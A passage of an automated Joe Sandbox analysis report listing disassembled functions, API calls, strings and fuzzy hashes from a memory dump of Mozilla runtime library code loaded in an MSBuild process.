                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C8EA264,6C8EA264), ref: 6C8E799A
                                                                                                                                                                                                                        • Part of subcall function 6C899830: free.MOZGLUE(?,?,?,6C8E7ABE), ref: 6C89985B
                                                                                                                                                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C8E79E0
                                                                                                                                                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C8E79E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3421697164-0
                                                                                                                                                                                                                      • Opcode ID: 177cd6addfe22e49c031d188a0e4422a2c8924dee2170b63071153c4629dd42d
                                                                                                                                                                                                                      • Instruction ID: 51fb10def3240bba12eda37e336b10c5e17c9fcedbb257ca80e8ecc65b5562de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 177cd6addfe22e49c031d188a0e4422a2c8924dee2170b63071153c4629dd42d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B2139757083049FCB14DF18D985A9EFBF5EF89314F54882DE84A87351CB30A909CB92
                                                                                                                                                                                                                      Function 6C89B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89B4F5
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89B502
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89B542
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C89B578
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: b536d793bee47bbe92eb56477316e05b8b0f2199aa5fd79bc206897908defa76
                                                                                                                                                                                                                      • Instruction ID: 0280f544dcc337e35d7cba1d25d1fd3b6f493d1ff03ed2933fbe40dd1bf0e809
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b536d793bee47bbe92eb56477316e05b8b0f2199aa5fd79bc206897908defa76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B11AF31A08B45C7D7318F6DC604761B3B5FF96318F249B1EE84953A01EBB1A2D5C794
                                                                                                                                                                                                                      Function 6C8C3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C88F20E,?), ref: 6C8C3DF5
                                                                                                                                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C88F20E,00000000,?), ref: 6C8C3DFC
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8C3E06
                                                                                                                                                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C8C3E0E
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC00: GetCurrentProcess.KERNEL32(?,?,6C8831A7), ref: 6C8BCC0D
                                                                                                                                                                                                                        • Part of subcall function 6C8BCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C8831A7), ref: 6C8BCC16
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2787204188-0
                                                                                                                                                                                                                      • Opcode ID: 088a17fb3f45ff2ab25599dba1cb140931bb0257c28e38ff7dde965c042bf68c
                                                                                                                                                                                                                      • Instruction ID: 2f1c49873298668f81ba0c112878692b82e23c46a456463a5aedfde26b3e5859
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 088a17fb3f45ff2ab25599dba1cb140931bb0257c28e38ff7dde965c042bf68c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46F0F8B1A002086BDB00AB58DD81DEB376DEB46668F150428FE0957741D736BE2A86F7
                                                                                                                                                                                                                      Function 6C8D2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D205B
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C8D201B,?,?,?,?,?,?,?,6C8D1F8F,?,?), ref: 6C8D2064
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8D208E
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,00000000,?,6C8D201B,?,?,?,?,?,?,?,6C8D1F8F,?,?), ref: 6C8D20A3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: 36b8b5f233346ff567b70c44055fd1bc49e348dd32486deb97350e88fe07555a
                                                                                                                                                                                                                      • Instruction ID: 45442b8c035d690fc9f657a3c33d47bc06f1287afd808de649b450f70461efb6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b8b5f233346ff567b70c44055fd1bc49e348dd32486deb97350e88fe07555a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F090B1204A00DBC7219F16D88875BB7F8EF86324F25052EE50687710C775BC06CB95
                                                                                                                                                                                                                      Function 6C8D20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D20B7
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C8BFBD1), ref: 6C8D20C0
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C8BFBD1), ref: 6C8D20DA
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C8BFBD1), ref: 6C8D20F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                      • Opcode ID: f9548bbe4468627d0756f3f5f0290c1de98a451f17f9a4223f19002351c4f6f2
                                                                                                                                                                                                                      • Instruction ID: 2615768e41c01f125d51f0785a0e05c7136072fe53168501b420b74984e7da93
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9548bbe4468627d0756f3f5f0290c1de98a451f17f9a4223f19002351c4f6f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E0E531704A158BC7309F29990854EB7F9FF86214B210A2EE50A83B00D779BD4687D5
                                                                                                                                                                                                                      Function 6C8D85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C8D85D3
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C8D8725
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                      • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                      • Opcode ID: 04cf9dccd56c61dc4b6364edd51148dff3515abdc6a43b8cd8fd3126239c1e9a
                                                                                                                                                                                                                      • Instruction ID: 69f2c2eec79f5b96b2c03a54cc74725992bce206ae09956eadf3b5d58b8b5bea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04cf9dccd56c61dc4b6364edd51148dff3515abdc6a43b8cd8fd3126239c1e9a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF5155746046458FC711CF18C288A5ABBE1BF4A328F1AC99AE8595BB52C335FC45CFD1
                                                                                                                                                                                                                      Function 6C88BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C88BDEB
                                                                                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C88BE8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                      • Opcode ID: eb4eae854d269370dd5150229e5048fd05aa96f94e073b2f4a9a5e2823556d38
                                                                                                                                                                                                                      • Instruction ID: a008c8816b80e0e312443fd6d2ccfaab4f57314afd7c035a83b660c0973cc6e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb4eae854d269370dd5150229e5048fd05aa96f94e073b2f4a9a5e2823556d38
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A141917150A749DFC721CF28C9819AFB7E4AFCA388F004E1DF98567A11D730D9498B92
                                                                                                                                                                                                                      Function 6C88F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • calloc.MOZGLUE(?,?), ref: 6C88F19B
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: EnterCriticalSection.KERNEL32(?), ref: 6C8AD904
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: LeaveCriticalSection.KERNEL32(?), ref: 6C8AD971
                                                                                                                                                                                                                        • Part of subcall function 6C8AD850: memset.VCRUNTIME140(?,00000000,?), ref: 6C8AD97B
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C88F209
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 3775194440-2564639436
                                                                                                                                                                                                                      • Opcode ID: ee2b24e20d15817ef740025cfc6d7bedcec1e2c364ca395ee71c1ceb00877a16
                                                                                                                                                                                                                      • Instruction ID: 26f76b4affda790d96b1255d27cb7b1388fa5dd99620abcdc004151f7349a0b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2b24e20d15817ef740025cfc6d7bedcec1e2c364ca395ee71c1ceb00877a16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77113A36B0664986EB148F5C9A511FEB379DF9620CB11552EDC45ABB11EB30A984C380
                                                                                                                                                                                                                      Function 6C8C3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C3D19
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C8C3D6C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                      • Opcode ID: e08230d0352b1339dbad369f3ebe0ab813057bac2426b043d6282324c26ff99c
                                                                                                                                                                                                                      • Instruction ID: 6d4873042d8f9cefe34a9dcbca73f98e89ab5334a2dea9d17dd19ce542c8faf0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08230d0352b1339dbad369f3ebe0ab813057bac2426b043d6282324c26ff99c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62110431F04688DBDB108F6DC9148EDB775EF86319B448A2DEE449B602EB30E9C5C391
                                                                                                                                                                                                                      Function 6C894730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8944B2,6C90E21C,6C90F7F8), ref: 6C89473E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C89474A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                      • String ID: GetNtLoaderAPI
                                                                                                                                                                                                                      • API String ID: 1646373207-1628273567
                                                                                                                                                                                                                      • Opcode ID: 584292489145056957eb056cdcad815753c825133baa93b470794c01c9b8b649
                                                                                                                                                                                                                      • Instruction ID: 65ff14aa323113beb0536fe5faa82346ee5d692073a074f8a6ab2bfdd7421448
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 584292489145056957eb056cdcad815753c825133baa93b470794c01c9b8b649
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1019E753082589FDF00AF6A89896597BB9FBCB765B24046DE905C7700CB70D801CF91
                                                                                                                                                                                                                      Function 6C8E6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C8E6E22
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E6E3F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C8E6E1D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                      • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                      • Opcode ID: 5345a3f0c1fef12dee7faa36ddac8d9659c0caf2f50272643576a795f8b453e8
                                                                                                                                                                                                                      • Instruction ID: 7652db37e9b79d12e2afc7486584219f28be35d428b523d10e57dd35aa197ec0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5345a3f0c1fef12dee7faa36ddac8d9659c0caf2f50272643576a795f8b453e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0593434824ECBDB20CB68CA60A913772574721CF34096DC51046BD1CB31E60EDB97
                                                                                                                                                                                                                      Function 6C899E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899EEF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                      • String ID: Infinity$NaN
                                                                                                                                                                                                                      • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                      • Opcode ID: 991c7560ee1acb5dfae8c9149588ef43e5edcc2f7994044cb3bbef947419d997
                                                                                                                                                                                                                      • Instruction ID: a43c4ebe1e805286b0d87699c67d2d07a9e92c6efaee4675f47ec53df47a0d15
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 991c7560ee1acb5dfae8c9149588ef43e5edcc2f7994044cb3bbef947419d997
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF0A970708241DBDB20CF58EA45B8433B5B75330CF300A2CC5180AB80D375A78ACB8A
                                                                                                                                                                                                                      Function 6C8E5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C9051C8), ref: 6C8E591A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C8E592B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C8E5915
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                      • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                      • API String ID: 297244470-335682676
                                                                                                                                                                                                                      • Opcode ID: acf65c8bc950d31959bcfb3c57d3efc0c0b3ca41de50acd00ee14f454810b4f8
                                                                                                                                                                                                                      • Instruction ID: 7f8ef9793c112e0b17c2fcb5b4e7d8dcd2fa707f321aa677833c8b3e6a03e34c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acf65c8bc950d31959bcfb3c57d3efc0c0b3ca41de50acd00ee14f454810b4f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94E01230309344A7DB105A7896487867FF89B17329F24494CE56993AD2C3B5A8408791
